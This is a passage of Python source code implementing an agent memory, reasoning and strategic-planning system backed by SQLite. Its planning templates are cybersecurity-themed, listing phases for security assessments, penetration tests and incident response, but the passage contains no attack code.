    progress_percentage: float = 0.0
    created_at: datetime = field(default_factory=datetime.now)
    updated_at: datetime = field(default_factory=datetime.now)

class PersistentMemoryManager:
    """Advanced persistent memory system for agents"""
+ + def __init__(self, db_path: str = "data/agent_memory.db"): + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self.logger = logging.getLogger("persistent_memory") + + # Memory organization + self.working_memory = deque(maxlen=100) # Active memories + self.memory_graph = nx.DiGraph() # Semantic relationships + self.memory_cache = {} # LRU cache for fast access + + # Initialize database + self._init_database() + + # Background processes + self.consolidation_thread = None + self.decay_thread = None + self._start_background_processes() + + def _init_database(self): + """Initialize the SQLite database for persistent storage""" + + self.conn = sqlite3.connect(self.db_path, check_same_thread=False) + self.conn.execute("PRAGMA foreign_keys = ON") + + # Memory entries table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_entries ( + memory_id TEXT PRIMARY KEY, + memory_type TEXT NOT NULL, + content BLOB NOT NULL, + timestamp REAL NOT NULL, + importance REAL NOT NULL, + access_count INTEGER DEFAULT 0, + last_accessed REAL NOT NULL, + decay_rate REAL NOT NULL, + tags TEXT DEFAULT '' + ) + """) + + # Reasoning chains table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_chains ( + chain_id TEXT PRIMARY KEY, + topic TEXT NOT NULL, + goal TEXT NOT NULL, + steps BLOB NOT NULL, + conclusion TEXT NOT NULL, + confidence REAL NOT NULL, + start_time REAL NOT NULL, + end_time REAL, + success BOOLEAN NOT NULL, + metadata BLOB DEFAULT '' + ) + """) + + # Strategic plans table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS strategic_plans ( + plan_id TEXT PRIMARY KEY, + title TEXT NOT NULL, + description TEXT NOT NULL, + primary_goal TEXT NOT NULL, + sub_goals BLOB NOT NULL, + timeline BLOB NOT NULL, + milestones BLOB NOT NULL, + success_criteria BLOB NOT NULL, + risk_factors BLOB NOT NULL, + resources_required BLOB NOT NULL, + current_status TEXT NOT NULL, + progress_percentage REAL NOT NULL, + created_at REAL 
NOT NULL, + updated_at REAL NOT NULL + ) + """) + + # Memory relationships table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_relationships ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + source_memory_id TEXT NOT NULL, + target_memory_id TEXT NOT NULL, + relationship_type TEXT NOT NULL, + strength REAL NOT NULL, + created_at REAL NOT NULL, + FOREIGN KEY (source_memory_id) REFERENCES memory_entries (memory_id), + FOREIGN KEY (target_memory_id) REFERENCES memory_entries (memory_id) + ) + """) + + self.conn.commit() + self.logger.info("Persistent memory database initialized") + + async def store_memory(self, memory_entry: MemoryEntry) -> str: + """Store a memory entry in persistent storage""" + + try: + # Store in database + self.conn.execute(""" + INSERT OR REPLACE INTO memory_entries + (memory_id, memory_type, content, timestamp, importance, + access_count, last_accessed, decay_rate, tags) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + memory_entry.memory_id, + memory_entry.memory_type.value, + pickle.dumps(memory_entry.content), + memory_entry.timestamp.timestamp(), + memory_entry.importance, + memory_entry.access_count, + memory_entry.last_accessed.timestamp(), + memory_entry.decay_rate, + json.dumps(list(memory_entry.tags)) + )) + + self.conn.commit() + + # Add to working memory if important + if memory_entry.importance > 0.5: + self.working_memory.append(memory_entry) + + # Update cache + self.memory_cache[memory_entry.memory_id] = memory_entry + + self.logger.debug(f"Stored memory: {memory_entry.memory_id}") + return memory_entry.memory_id + + except Exception as e: + self.logger.error(f"Error storing memory: {e}") + return None + + async def retrieve_memory(self, memory_id: str) -> Optional[MemoryEntry]: + """Retrieve a specific memory by ID""" + + # Check cache first + if memory_id in self.memory_cache: + memory = self.memory_cache[memory_id] + memory.access_count += 1 + memory.last_accessed = datetime.now() + return memory + + try: + cursor = 
self.conn.execute(""" + SELECT * FROM memory_entries WHERE memory_id = ? + """, (memory_id,)) + + row = cursor.fetchone() + if row: + memory = MemoryEntry( + memory_id=row[0], + memory_type=MemoryType(row[1]), + content=pickle.loads(row[2]), + timestamp=datetime.fromtimestamp(row[3]), + importance=row[4], + access_count=row[5] + 1, + last_accessed=datetime.now(), + decay_rate=row[7], + tags=set(json.loads(row[8])) + ) + + # Update access count + self.conn.execute(""" + UPDATE memory_entries + SET access_count = ?, last_accessed = ? + WHERE memory_id = ? + """, (memory.access_count, memory.last_accessed.timestamp(), memory_id)) + self.conn.commit() + + # Cache the memory + self.memory_cache[memory_id] = memory + + return memory + + except Exception as e: + self.logger.error(f"Error retrieving memory {memory_id}: {e}") + + return None + + async def search_memories(self, query: str, memory_types: List[MemoryType] = None, + limit: int = 50) -> List[MemoryEntry]: + """Search memories based on content and type""" + + memories = [] + + try: + # Build query conditions + conditions = [] + params = [] + + if memory_types: + type_conditions = " OR ".join(["memory_type = ?"] * len(memory_types)) + conditions.append(f"({type_conditions})") + params.extend([mt.value for mt in memory_types]) + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = self.conn.execute(f""" + SELECT * FROM memory_entries + WHERE {where_clause} + ORDER BY importance DESC, last_accessed DESC + LIMIT ? 
+ """, params + [limit]) + + for row in cursor.fetchall(): + memory = MemoryEntry( + memory_id=row[0], + memory_type=MemoryType(row[1]), + content=pickle.loads(row[2]), + timestamp=datetime.fromtimestamp(row[3]), + importance=row[4], + access_count=row[5], + last_accessed=datetime.fromtimestamp(row[6]), + decay_rate=row[7], + tags=set(json.loads(row[8])) + ) + + # Simple text matching (can be enhanced with vector similarity) + if self._matches_query(memory, query): + memories.append(memory) + + except Exception as e: + self.logger.error(f"Error searching memories: {e}") + + return sorted(memories, key=lambda m: m.importance, reverse=True) + + def _matches_query(self, memory: MemoryEntry, query: str) -> bool: + """Simple text matching for memory search""" + query_lower = query.lower() + + # Search in content + content_str = json.dumps(memory.content).lower() + if query_lower in content_str: + return True + + # Search in tags + for tag in memory.tags: + if query_lower in tag.lower(): + return True + + return False + + async def consolidate_memories(self): + """Consolidate and organize memories""" + + try: + # Get all working memories + working_memories = list(self.working_memory) + + # Group related memories + memory_groups = self._group_related_memories(working_memories) + + # Create consolidated memories + for group in memory_groups: + if len(group) > 1: + consolidated = await self._create_consolidated_memory(group) + await self.store_memory(consolidated) + + self.logger.info(f"Consolidated {len(memory_groups)} memory groups") + + except Exception as e: + self.logger.error(f"Error consolidating memories: {e}") + + def _group_related_memories(self, memories: List[MemoryEntry]) -> List[List[MemoryEntry]]: + """Group related memories together""" + groups = [] + processed = set() + + for memory in memories: + if memory.memory_id in processed: + continue + + # Find related memories + related = [memory] + for other_memory in memories: + if (other_memory.memory_id != 
memory.memory_id and + other_memory.memory_id not in processed): + + # Simple relatedness check (can be enhanced) + if self._are_memories_related(memory, other_memory): + related.append(other_memory) + processed.add(other_memory.memory_id) + + if related: + groups.append(related) + for mem in related: + processed.add(mem.memory_id) + + return groups + + def _are_memories_related(self, mem1: MemoryEntry, mem2: MemoryEntry) -> bool: + """Check if two memories are related""" + + # Check temporal proximity + time_diff = abs((mem1.timestamp - mem2.timestamp).total_seconds()) + if time_diff < 3600: # Within 1 hour + return True + + # Check tag overlap + tag_overlap = len(mem1.tags.intersection(mem2.tags)) + if tag_overlap > 0: + return True + + # Check content similarity (simple approach) + content1 = json.dumps(mem1.content).lower() + content2 = json.dumps(mem2.content).lower() + + # Simple word overlap + words1 = set(content1.split()) + words2 = set(content2.split()) + overlap_ratio = len(words1.intersection(words2)) / max(len(words1), len(words2)) + + return overlap_ratio > 0.3 + + async def _create_consolidated_memory(self, memories: List[MemoryEntry]) -> MemoryEntry: + """Create a consolidated memory from related memories""" + + # Combine content + consolidated_content = { + "type": "consolidated", + "source_memories": [mem.memory_id for mem in memories], + "combined_content": [mem.content for mem in memories], + "themes": self._extract_themes(memories) + } + + # Calculate importance + importance = max(mem.importance for mem in memories) + + # Combine tags + all_tags = set() + for mem in memories: + all_tags.update(mem.tags) + all_tags.add("consolidated") + + return MemoryEntry( + memory_type=MemoryType.SEMANTIC, + content=consolidated_content, + importance=importance, + tags=all_tags + ) + + def _extract_themes(self, memories: List[MemoryEntry]) -> List[str]: + """Extract common themes from memories""" + + # Simple theme extraction (can be enhanced with NLP) + 
all_text = " ".join([ + json.dumps(mem.content) for mem in memories + ]).lower() + + # Common cybersecurity themes + themes = [] + security_themes = [ + "vulnerability", "threat", "attack", "exploit", "malware", + "phishing", "social engineering", "network security", "encryption", + "authentication", "authorization", "firewall", "intrusion" + ] + + for theme in security_themes: + if theme in all_text: + themes.append(theme) + + return themes + + def _start_background_processes(self): + """Start background memory management processes""" + + def consolidation_worker(): + while True: + try: + time.sleep(300) # Every 5 minutes + asyncio.run(self.consolidate_memories()) + except Exception as e: + self.logger.error(f"Consolidation error: {e}") + + def decay_worker(): + while True: + try: + time.sleep(600) # Every 10 minutes + self._apply_memory_decay() + except Exception as e: + self.logger.error(f"Decay error: {e}") + + # Start background threads + self.consolidation_thread = threading.Thread(target=consolidation_worker, daemon=True) + self.decay_thread = threading.Thread(target=decay_worker, daemon=True) + + self.consolidation_thread.start() + self.decay_thread.start() + + self.logger.info("Background memory processes started") + + def _apply_memory_decay(self): + """Apply decay to memories over time""" + + try: + cursor = self.conn.execute(""" + SELECT memory_id, importance, last_accessed, decay_rate + FROM memory_entries + """) + + updates = [] + current_time = datetime.now().timestamp() + + for row in cursor.fetchall(): + memory_id, importance, last_accessed, decay_rate = row + + # Calculate time since last access + time_since_access = current_time - last_accessed + + # Apply decay (exponential decay) + decay_factor = np.exp(-decay_rate * time_since_access / 86400) # Days + new_importance = importance * decay_factor + + # Minimum importance threshold + if new_importance < 0.01: + new_importance = 0.01 + + updates.append((new_importance, memory_id)) + + # Batch 
update + self.conn.executemany(""" + UPDATE memory_entries SET importance = ? WHERE memory_id = ? + """, updates) + + self.conn.commit() + self.logger.debug(f"Applied decay to {len(updates)} memories") + + except Exception as e: + self.logger.error(f"Error applying memory decay: {e}") + +class AdvancedReasoningEngine: + """Advanced reasoning engine with multiple reasoning types""" + + def __init__(self, memory_manager: PersistentMemoryManager): + self.memory_manager = memory_manager + self.logger = logging.getLogger("reasoning_engine") + + # Reasoning components + self.inference_rules = self._load_inference_rules() + self.reasoning_strategies = { + ReasoningType.DEDUCTIVE: self._deductive_reasoning, + ReasoningType.INDUCTIVE: self._inductive_reasoning, + ReasoningType.ABDUCTIVE: self._abductive_reasoning, + ReasoningType.ANALOGICAL: self._analogical_reasoning, + ReasoningType.CAUSAL: self._causal_reasoning, + ReasoningType.STRATEGIC: self._strategic_reasoning, + ReasoningType.COUNTERFACTUAL: self._counterfactual_reasoning, + ReasoningType.META_COGNITIVE: self._meta_cognitive_reasoning + } + + # Active reasoning chains + self.active_chains = {} + + def _load_inference_rules(self) -> Dict[str, Dict[str, Any]]: + """Load inference rules for different reasoning types""" + + return { + "modus_ponens": { + "pattern": "If P then Q, P is true", + "conclusion": "Q is true", + "confidence_base": 0.9 + }, + "modus_tollens": { + "pattern": "If P then Q, Q is false", + "conclusion": "P is false", + "confidence_base": 0.85 + }, + "hypothetical_syllogism": { + "pattern": "If P then Q, If Q then R", + "conclusion": "If P then R", + "confidence_base": 0.8 + }, + "disjunctive_syllogism": { + "pattern": "P or Q, not P", + "conclusion": "Q", + "confidence_base": 0.8 + }, + "causal_inference": { + "pattern": "Event A precedes Event B, correlation observed", + "conclusion": "A may cause B", + "confidence_base": 0.6 + } + } + + async def start_reasoning_chain(self, topic: str, goal: str, 
+ reasoning_type: ReasoningType = ReasoningType.DEDUCTIVE) -> str: + """Start a new reasoning chain""" + + chain = ReasoningChain( + topic=topic, + goal=goal, + metadata={"reasoning_type": reasoning_type.value} + ) + + self.active_chains[chain.chain_id] = chain + + # Store in memory + memory_entry = MemoryEntry( + memory_type=MemoryType.PROCEDURAL, + content={ + "type": "reasoning_chain_start", + "chain_id": chain.chain_id, + "topic": topic, + "goal": goal, + "reasoning_type": reasoning_type.value + }, + importance=0.7, + tags={"reasoning", "chain_start", reasoning_type.value} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.info(f"Started reasoning chain: {chain.chain_id}") + return chain.chain_id + + async def add_reasoning_step(self, chain_id: str, premise: str, + inference_rule: str = "", evidence: List[str] = None) -> str: + """Add a step to an active reasoning chain""" + + if chain_id not in self.active_chains: + self.logger.error(f"Reasoning chain {chain_id} not found") + return None + + chain = self.active_chains[chain_id] + evidence = evidence or [] + + # Determine reasoning type from chain metadata + reasoning_type = ReasoningType(chain.metadata.get("reasoning_type", "deductive")) + + # Apply reasoning strategy + reasoning_func = self.reasoning_strategies.get(reasoning_type, self._deductive_reasoning) + conclusion, confidence = await reasoning_func(premise, inference_rule, evidence, chain) + + # Create reasoning step + step = ReasoningStep( + reasoning_type=reasoning_type, + premise=premise, + inference_rule=inference_rule, + conclusion=conclusion, + confidence=confidence, + evidence=evidence, + dependencies=[s.step_id for s in chain.steps[-3:]] # Last 3 steps + ) + + chain.steps.append(step) + + # Store step in memory + memory_entry = MemoryEntry( + memory_type=MemoryType.PROCEDURAL, + content={ + "type": "reasoning_step", + "chain_id": chain_id, + "step_id": step.step_id, + "premise": premise, + "conclusion": conclusion, + 
"confidence": confidence, + "inference_rule": inference_rule + }, + importance=confidence, + tags={"reasoning", "step", reasoning_type.value} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.debug(f"Added reasoning step to chain {chain_id}") + return step.step_id + + async def _deductive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply deductive reasoning""" + + # Look up inference rule + if inference_rule in self.inference_rules: + rule = self.inference_rules[inference_rule] + base_confidence = rule["confidence_base"] + + # Apply rule logic (simplified) + if "modus_ponens" in inference_rule.lower(): + conclusion = f"Therefore, the consequent follows from the premise: {premise}" + confidence = base_confidence + else: + conclusion = f"Following {inference_rule}: {premise}" + confidence = base_confidence * 0.8 + else: + # Default deductive reasoning + conclusion = f"Based on logical deduction from: {premise}" + confidence = 0.7 + + # Adjust confidence based on evidence + if evidence: + confidence = min(confidence + len(evidence) * 0.05, 0.95) + + return conclusion, confidence + + async def _inductive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply inductive reasoning""" + + # Inductive reasoning builds general conclusions from specific observations + pattern_strength = len(evidence) / max(len(chain.steps) + 1, 1) + + conclusion = f"Based on observed pattern in {len(evidence)} cases: {premise}" + confidence = min(0.3 + pattern_strength * 0.4, 0.8) # Inductive reasoning is less certain + + return conclusion, confidence + + async def _abductive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply abductive reasoning (inference to best explanation)""" + + # Abductive reasoning finds the best explanation for 
observations + explanation_quality = len(evidence) * 0.1 + + conclusion = f"Best explanation for '{premise}' given available evidence" + confidence = min(0.5 + explanation_quality, 0.75) # Moderate confidence + + return conclusion, confidence + + async def _analogical_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply analogical reasoning""" + + # Search for similar past experiences in memory + similar_memories = await self.memory_manager.search_memories( + premise, [MemoryType.EPISODIC], limit=5 + ) + + if similar_memories: + analogy_strength = len(similar_memories) * 0.15 + conclusion = f"By analogy to {len(similar_memories)} similar cases: {premise}" + confidence = min(0.4 + analogy_strength, 0.7) + else: + conclusion = f"No strong analogies found for: {premise}" + confidence = 0.3 + + return conclusion, confidence + + async def _causal_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply causal reasoning""" + + # Look for temporal and correlational patterns + causal_indicators = ["caused by", "resulted in", "led to", "triggered"] + + causal_strength = sum(1 for indicator in causal_indicators if indicator in premise.lower()) + temporal_evidence = len([e for e in evidence if "time" in e.lower() or "sequence" in e.lower()]) + + conclusion = f"Causal relationship identified: {premise}" + confidence = min(0.4 + (causal_strength * 0.1) + (temporal_evidence * 0.1), 0.8) + + return conclusion, confidence + + async def _strategic_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply strategic reasoning for long-term planning""" + + # Strategic reasoning considers multiple steps and long-term goals + strategic_depth = len(chain.steps) + goal_alignment = 0.8 if chain.goal.lower() in premise.lower() else 0.5 + + conclusion = f"Strategic 
implication: {premise} aligns with long-term objectives" + confidence = min(goal_alignment + (strategic_depth * 0.05), 0.85) + + return conclusion, confidence + + async def _counterfactual_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply counterfactual reasoning (what-if scenarios)""" + + # Counterfactual reasoning explores alternative scenarios + scenario_plausibility = 0.6 # Default plausibility + + if "what if" in premise.lower() or "if not" in premise.lower(): + scenario_plausibility += 0.1 + + conclusion = f"Counterfactual analysis: {premise} would lead to alternative outcomes" + confidence = min(scenario_plausibility, 0.7) # Inherently speculative + + return conclusion, confidence + + async def _meta_cognitive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply meta-cognitive reasoning (reasoning about reasoning)""" + + # Meta-cognitive reasoning evaluates the reasoning process itself + reasoning_quality = sum(step.confidence for step in chain.steps) / max(len(chain.steps), 1) + + conclusion = f"Meta-analysis of reasoning quality: {reasoning_quality:.2f} average confidence" + confidence = reasoning_quality + + return conclusion, confidence + + async def complete_reasoning_chain(self, chain_id: str) -> Optional[ReasoningChain]: + """Complete a reasoning chain and store results""" + + if chain_id not in self.active_chains: + self.logger.error(f"Reasoning chain {chain_id} not found") + return None + + chain = self.active_chains[chain_id] + chain.end_time = datetime.now() + + # Generate final conclusion + if chain.steps: + # Combine conclusions from all steps + step_conclusions = [step.conclusion for step in chain.steps] + chain.conclusion = f"Final reasoning conclusion: {' โ†’ '.join(step_conclusions[-3:])}" + + # Calculate overall confidence + confidences = [step.confidence for step in chain.steps] + 
chain.confidence = sum(confidences) / len(confidences) if confidences else 0.0 + + chain.success = chain.confidence > 0.5 + else: + chain.conclusion = "No reasoning steps completed" + chain.success = False + + # Store completed chain in database + try: + self.memory_manager.conn.execute(""" + INSERT OR REPLACE INTO reasoning_chains + (chain_id, topic, goal, steps, conclusion, confidence, + start_time, end_time, success, metadata) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + chain.chain_id, + chain.topic, + chain.goal, + pickle.dumps(chain.steps), + chain.conclusion, + chain.confidence, + chain.start_time.timestamp(), + chain.end_time.timestamp(), + chain.success, + pickle.dumps(chain.metadata) + )) + + self.memory_manager.conn.commit() + + # Store in episodic memory + memory_entry = MemoryEntry( + memory_type=MemoryType.EPISODIC, + content={ + "type": "completed_reasoning_chain", + "chain_id": chain.chain_id, + "topic": chain.topic, + "conclusion": chain.conclusion, + "success": chain.success, + "duration": (chain.end_time - chain.start_time).total_seconds() + }, + importance=chain.confidence, + tags={"reasoning", "completed", chain.metadata.get("reasoning_type", "unknown")} + ) + + await self.memory_manager.store_memory(memory_entry) + + # Remove from active chains + del self.active_chains[chain_id] + + self.logger.info(f"Completed reasoning chain: {chain_id}") + return chain + + except Exception as e: + self.logger.error(f"Error completing reasoning chain: {e}") + return None + +class StrategicPlanningEngine: + """Long-term strategic planning and goal decomposition""" + + def __init__(self, memory_manager: PersistentMemoryManager, reasoning_engine: AdvancedReasoningEngine): + self.memory_manager = memory_manager + self.reasoning_engine = reasoning_engine + self.logger = logging.getLogger("strategic_planning") + + # Planning templates + self.planning_templates = self._load_planning_templates() + + # Active plans + self.active_plans = {} + + def 
_load_planning_templates(self) -> Dict[str, Dict[str, Any]]: + """Load strategic planning templates""" + + return { + "cybersecurity_assessment": { + "phases": [ + "reconnaissance", + "vulnerability_analysis", + "threat_modeling", + "risk_assessment", + "mitigation_planning", + "implementation", + "monitoring" + ], + "typical_duration": 30, # days + "success_criteria": [ + "Complete security posture assessment", + "Identified all critical vulnerabilities", + "Developed mitigation strategies", + "Implemented security controls" + ] + }, + "penetration_testing": { + "phases": [ + "scoping", + "information_gathering", + "threat_modeling", + "vulnerability_assessment", + "exploitation", + "post_exploitation", + "reporting" + ], + "typical_duration": 14, # days + "success_criteria": [ + "Identified exploitable vulnerabilities", + "Demonstrated business impact", + "Provided remediation recommendations" + ] + }, + "incident_response": { + "phases": [ + "detection", + "analysis", + "containment", + "eradication", + "recovery", + "lessons_learned" + ], + "typical_duration": 7, # days + "success_criteria": [ + "Contained security incident", + "Minimized business impact", + "Prevented future incidents" + ] + } + } + + async def create_strategic_plan(self, title: str, primary_goal: str, + template_type: str = "cybersecurity_assessment") -> str: + """Create a new strategic plan""" + + template = self.planning_templates.get(template_type, {}) + + # Decompose primary goal into sub-goals + sub_goals = await self._decompose_goal(primary_goal, template) + + # Create timeline + timeline = self._create_timeline(template, sub_goals) + + # Generate milestones + milestones = self._generate_milestones(sub_goals, timeline) + + # Assess risks + risk_factors = await self._assess_risks(primary_goal, sub_goals) + + # Determine resources + resources_required = self._determine_resources(template, sub_goals) + + plan = StrategicPlan( + title=title, + description=f"Strategic plan for 
{primary_goal}", + primary_goal=primary_goal, + sub_goals=sub_goals, + timeline=timeline, + milestones=milestones, + success_criteria=template.get("success_criteria", []), + risk_factors=risk_factors, + resources_required=resources_required, + current_status="planning" + ) + + # Store in database + try: + self.memory_manager.conn.execute(""" + INSERT INTO strategic_plans + (plan_id, title, description, primary_goal, sub_goals, timeline, + milestones, success_criteria, risk_factors, resources_required, + current_status, progress_percentage, created_at, updated_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + plan.plan_id, + plan.title, + plan.description, + plan.primary_goal, + pickle.dumps(plan.sub_goals), + pickle.dumps(plan.timeline), + pickle.dumps(plan.milestones), + pickle.dumps(plan.success_criteria), + pickle.dumps(plan.risk_factors), + pickle.dumps(plan.resources_required), + plan.current_status, + plan.progress_percentage, + plan.created_at.timestamp(), + plan.updated_at.timestamp() + )) + + self.memory_manager.conn.commit() + + # Add to active plans + self.active_plans[plan.plan_id] = plan + + # Store in episodic memory + memory_entry = MemoryEntry( + memory_type=MemoryType.STRATEGIC, + content={ + "type": "strategic_plan_created", + "plan_id": plan.plan_id, + "title": title, + "primary_goal": primary_goal, + "sub_goals_count": len(sub_goals) + }, + importance=0.8, + tags={"strategic_planning", "plan_created", template_type} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.info(f"Created strategic plan: {plan.plan_id}") + return plan.plan_id + + except Exception as e: + self.logger.error(f"Error creating strategic plan: {e}") + return None + + async def _decompose_goal(self, primary_goal: str, template: Dict[str, Any]) -> List[str]: + """Decompose primary goal into actionable sub-goals""" + + # Start reasoning chain for goal decomposition + chain_id = await self.reasoning_engine.start_reasoning_chain( + 
topic=f"Goal Decomposition: {primary_goal}", + goal="Break down primary goal into actionable sub-goals", + reasoning_type=ReasoningType.STRATEGIC + ) + + sub_goals = [] + + # Use template phases if available + if "phases" in template: + for phase in template["phases"]: + sub_goal = f"Complete {phase} phase for {primary_goal}" + sub_goals.append(sub_goal) + + # Add reasoning step + await self.reasoning_engine.add_reasoning_step( + chain_id, + f"Phase {phase} is essential for achieving {primary_goal}", + "strategic_decomposition" + ) + else: + # Generic decomposition + generic_phases = [ + "planning and preparation", + "implementation and execution", + "monitoring and evaluation", + "optimization and improvement" + ] + + for phase in generic_phases: + sub_goal = f"Complete {phase} for {primary_goal}" + sub_goals.append(sub_goal) + + # Complete reasoning chain + await self.reasoning_engine.complete_reasoning_chain(chain_id) + + return sub_goals + + def _create_timeline(self, template: Dict[str, Any], sub_goals: List[str]) -> Dict[str, datetime]: + """Create timeline for strategic plan""" + + timeline = {} + start_date = datetime.now() + + # Total duration from template or estimate + total_duration = template.get("typical_duration", len(sub_goals) * 3) # days + duration_per_goal = total_duration / len(sub_goals) if sub_goals else 1 + + current_date = start_date + + for i, sub_goal in enumerate(sub_goals): + timeline[f"sub_goal_{i}_start"] = current_date + timeline[f"sub_goal_{i}_end"] = current_date + timedelta(days=duration_per_goal) + current_date = timeline[f"sub_goal_{i}_end"] + + timeline["plan_start"] = start_date + timeline["plan_end"] = current_date + + return timeline + + def _generate_milestones(self, sub_goals: List[str], timeline: Dict[str, datetime]) -> List[Dict[str, Any]]: + """Generate milestones for strategic plan""" + + milestones = [] + + for i, sub_goal in enumerate(sub_goals): + milestone = { + "milestone_id": str(uuid.uuid4()), + "title": 
f"Milestone {i+1}: {sub_goal}", + "description": f"Complete sub-goal: {sub_goal}", + "target_date": timeline.get(f"sub_goal_{i}_end", datetime.now()), + "success_criteria": [f"Successfully complete {sub_goal}"], + "status": "pending", + "progress_percentage": 0.0 + } + + milestones.append(milestone) + + return milestones + + async def _assess_risks(self, primary_goal: str, sub_goals: List[str]) -> List[str]: + """Assess potential risks for the strategic plan""" + + # Start reasoning chain for risk assessment + chain_id = await self.reasoning_engine.start_reasoning_chain( + topic=f"Risk Assessment: {primary_goal}", + goal="Identify potential risks and mitigation strategies", + reasoning_type=ReasoningType.STRATEGIC + ) + + # Common cybersecurity risks + common_risks = [ + "Technical complexity may exceed available expertise", + "Timeline constraints may impact quality", + "Resource availability may be limited", + "External dependencies may cause delays", + "Changing requirements may affect scope", + "Security vulnerabilities may be discovered during implementation", + "Stakeholder availability may be limited" + ] + + # Assess relevance of each risk + relevant_risks = [] + + for risk in common_risks: + # Add reasoning step for each risk + await self.reasoning_engine.add_reasoning_step( + chain_id, + f"Risk consideration: {risk}", + "risk_assessment" + ) + + relevant_risks.append(risk) + + # Complete reasoning chain + await self.reasoning_engine.complete_reasoning_chain(chain_id) + + return relevant_risks + + def _determine_resources(self, template: Dict[str, Any], sub_goals: List[str]) -> List[str]: + """Determine required resources for strategic plan""" + + # Common resources for cybersecurity plans + base_resources = [ + "Cybersecurity expertise", + "Technical infrastructure access", + "Documentation and reporting tools", + "Communication and collaboration platforms" + ] + + # Template-specific resources + if "resources" in template: + 
base_resources.extend(template["resources"]) + + # Add resources based on sub-goals + specialized_resources = [] + + for sub_goal in sub_goals: + if "vulnerability" in sub_goal.lower(): + specialized_resources.append("Vulnerability scanning tools") + elif "penetration" in sub_goal.lower(): + specialized_resources.append("Penetration testing tools") + elif "monitoring" in sub_goal.lower(): + specialized_resources.append("Security monitoring platforms") + + return list(set(base_resources + specialized_resources)) + + async def update_plan_progress(self, plan_id: str, milestone_id: str = None, + progress_percentage: float = None, status: str = None) -> bool: + """Update progress of strategic plan""" + + try: + if plan_id not in self.active_plans: + # Load from database + plan = await self._load_plan(plan_id) + if not plan: + self.logger.error(f"Plan {plan_id} not found") + return False + self.active_plans[plan_id] = plan + + plan = self.active_plans[plan_id] + + # Update milestone if specified + if milestone_id: + for milestone in plan.milestones: + if milestone["milestone_id"] == milestone_id: + if progress_percentage is not None: + milestone["progress_percentage"] = progress_percentage + if status: + milestone["status"] = status + break + + # Update overall plan progress + if progress_percentage is not None: + plan.progress_percentage = progress_percentage + + if status: + plan.current_status = status + + plan.updated_at = datetime.now() + + # Update database + self.memory_manager.conn.execute(""" + UPDATE strategic_plans + SET milestones = ?, progress_percentage = ?, + current_status = ?, updated_at = ? + WHERE plan_id = ? 
+ """, ( + pickle.dumps(plan.milestones), + plan.progress_percentage, + plan.current_status, + plan.updated_at.timestamp(), + plan_id + )) + + self.memory_manager.conn.commit() + + # Store progress update in memory + memory_entry = MemoryEntry( + memory_type=MemoryType.EPISODIC, + content={ + "type": "plan_progress_update", + "plan_id": plan_id, + "milestone_id": milestone_id, + "progress_percentage": progress_percentage, + "status": status + }, + importance=0.6, + tags={"strategic_planning", "progress_update"} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.info(f"Updated plan progress: {plan_id}") + return True + + except Exception as e: + self.logger.error(f"Error updating plan progress: {e}") + return False + + async def _load_plan(self, plan_id: str) -> Optional[StrategicPlan]: + """Load strategic plan from database""" + + try: + cursor = self.memory_manager.conn.execute(""" + SELECT * FROM strategic_plans WHERE plan_id = ? + """, (plan_id,)) + + row = cursor.fetchone() + if row: + return StrategicPlan( + plan_id=row[0], + title=row[1], + description=row[2], + primary_goal=row[3], + sub_goals=pickle.loads(row[4]), + timeline=pickle.loads(row[5]), + milestones=pickle.loads(row[6]), + success_criteria=pickle.loads(row[7]), + risk_factors=pickle.loads(row[8]), + resources_required=pickle.loads(row[9]), + current_status=row[10], + progress_percentage=row[11], + created_at=datetime.fromtimestamp(row[12]), + updated_at=datetime.fromtimestamp(row[13]) + ) + + except Exception as e: + self.logger.error(f"Error loading plan {plan_id}: {e}") + + return None + +# Integration class that brings everything together +class PersistentCognitiveSystem: + """Main system that integrates persistent memory, reasoning, and strategic planning""" + + def __init__(self, db_path: str = "data/cognitive_system.db"): + # Initialize components + self.memory_manager = PersistentMemoryManager(db_path) + self.reasoning_engine = 
# Integration class that brings everything together
class PersistentCognitiveSystem:
    """Facade wiring persistent memory, reasoning, and strategic planning together."""

    def __init__(self, db_path: str = "data/cognitive_system.db"):
        # Build the three cooperating subsystems over one shared database.
        self.memory_manager = PersistentMemoryManager(db_path)
        self.reasoning_engine = AdvancedReasoningEngine(self.memory_manager)
        self.strategic_planner = StrategicPlanningEngine(self.memory_manager, self.reasoning_engine)

        self.logger = logging.getLogger("persistent_cognitive_system")
        self.logger.info("Persistent cognitive system initialized")

    async def process_complex_scenario(self, scenario: Dict[str, Any]) -> Dict[str, Any]:
        """Run a scenario through memory, planning, and reasoning; return a result report."""
        scenario_id = str(uuid.uuid4())
        self.logger.info(f"Processing complex scenario: {scenario_id}")

        results = {
            "scenario_id": scenario_id,
            "timestamp": datetime.now().isoformat(),
            "results": {}
        }

        try:
            # 1) Persist the raw scenario as an episodic memory.
